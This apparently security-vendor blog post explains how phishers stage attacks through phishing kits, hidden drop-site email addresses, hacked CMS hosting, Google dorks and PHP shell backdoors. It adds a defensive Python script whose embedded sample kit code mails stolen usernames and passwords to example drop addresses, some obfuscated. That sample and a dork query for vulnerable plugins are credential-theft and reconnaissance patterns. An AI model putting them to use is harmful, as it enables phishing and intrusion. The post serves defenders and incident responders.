At its highest level, the phishing process consists of staging an attack, launching it, collecting stolen credentials, and monetizing them. Today’s phishers use a range of tools to carry out their attacks. These tools are available for free or may be purchased in underground markets. More advanced phishers may build their own tools and incorporate layers of automation that further reduce the effort and costs required from start to finish.
Today's post focuses on staging a phishing attack. To stage a phishing attack, fraudsters need two basic things:
- A phishing kit (the files that make up the phish site).
- A website where the phish site can be hosted.
Phishing kits are pre-packaged sets of the files needed to make a phish site. They are typically packaged in a compressed archive format such as .zip, .rar, or .tgz. Phishing kits are posted for sale, or for free download, on a wide range of online cybercrime forums, kit distribution sites and IRC channels.
Phishing kits are usually configured to send stolen information to “drop site” email addresses or to save the data to a file on the webserver on which the phish site is hosted. To prevent drop sites from being easily found, phishing kits may obfuscate the email addresses in the code. Some phish kit authors place hidden drop sites in the kits they sell or give away, allowing them to secretly harvest information stolen by other fraudsters.
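As an added example (not code from the original post), here is a small Python script an incident responder could run over the PHP files of a recovered phishing kit to locate drop-site addresses, including ones hidden by base64 encoding or string concatenation. The kit source it scans is constructed for this example.

```python
import base64
import re

# Constructed sample of a phishing kit's "send" script (not a real kit):
# one drop address is plaintext, one is hidden in base64, one is split
# across a string concatenation.
SAMPLE_KIT_PHP = r'''
<?php
$ip = getenv("REMOTE_ADDR");
$message .= "Username: ".$_POST['user']."\n";
$message .= "Password: ".$_POST['pass']."\n";
$recipient = "drop1@example.com";
mail($recipient, "Rezult from $ip", $message);
mail(base64_decode("aGlkZGVuQGV4YW1wbGUubmV0"), "Rezult", $message);
$r2 = "ow" . "ner@exam" . "ple.org";
mail($r2, "Rezult", $message);
?>
'''

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
B64_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")   # candidate base64 blobs


def find_drop_addresses(php_source: str) -> dict:
    """Return {address: how_it_was_hidden} for every address found in the kit."""
    found = {}
    # 1. Plaintext addresses anywhere in the source.
    for m in EMAIL_RE.finditer(php_source):
        found.setdefault(m.group(0), "plaintext")
    # 2. base64 blobs that decode to printable text containing an address.
    for m in B64_RE.finditer(php_source):
        blob = m.group(0)
        try:
            raw = base64.b64decode(blob + "=" * (-len(blob) % 4), validate=True)
            decoded = raw.decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue
        for addr in EMAIL_RE.findall(decoded):
            found.setdefault(addr, "base64")
    # 3. Join adjacent string literals ("a" . "b") and look again.
    joined = re.sub(r'"\s*\.\s*"', "", php_source)
    for addr in EMAIL_RE.findall(joined):
        found.setdefault(addr, "concatenated")
    return found


if __name__ == "__main__":
    for addr, how in sorted(find_drop_addresses(SAMPLE_KIT_PHP).items()):
        print(f"{addr:30} ({how})")
```

Run it against every .php file in a kit archive; addresses that turn up only via base64 or concatenation are the ones most worth reporting as hidden drop sites.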
Hosting phishing sites
Before launching an attack, phishers must find a place to host their phishing site. Phishers have a few basic options for this:
- Hack a vulnerable website
- Use a free hosting service
- Purchase illegitimate hosting services (“Bulletproof” hosting for example)
- Pay for legitimate hosting services
By far, most phishing sites are hosted on hacked websites:
[Chart: how phishing sites are hosted. Source: The Anti-Phishing Working Group]
There is an abundance of websites running vulnerable deployments of popular CMS platforms like WordPress, Joomla and Drupal. These sites are also less likely to be on domains that are blacklisted by safe browsing technologies and endpoint security products.
Vulnerable websites can be easily found using specialized search queries (“Google dorks”) that look for sites with an exploitable weakness. For example, “inurl: wp-content/plugins/VULNERABLE PLUGIN” is a basic query that could be used by an attacker to find WordPress sites with a plugin that has exploitable vulnerabilities.
Cybercriminals also use bots to scan the Web for vulnerable sites. Scanner bots are frequently used to find websites with Remote or Local File Inclusion (RFI/LFI) vulnerabilities, a common flaw in PHP code that lets an attacker include files of their choosing and thereby execute malicious code.
When a vulnerable website is found, phishers exploit the vulnerability to install a backdoor (often a PHP shell). From there, they upload their phishing kit and the phish site is now live.
To learn more about how phishing attacks work and how to stop them, check out the "How to Fight Back against Phishing" white paper.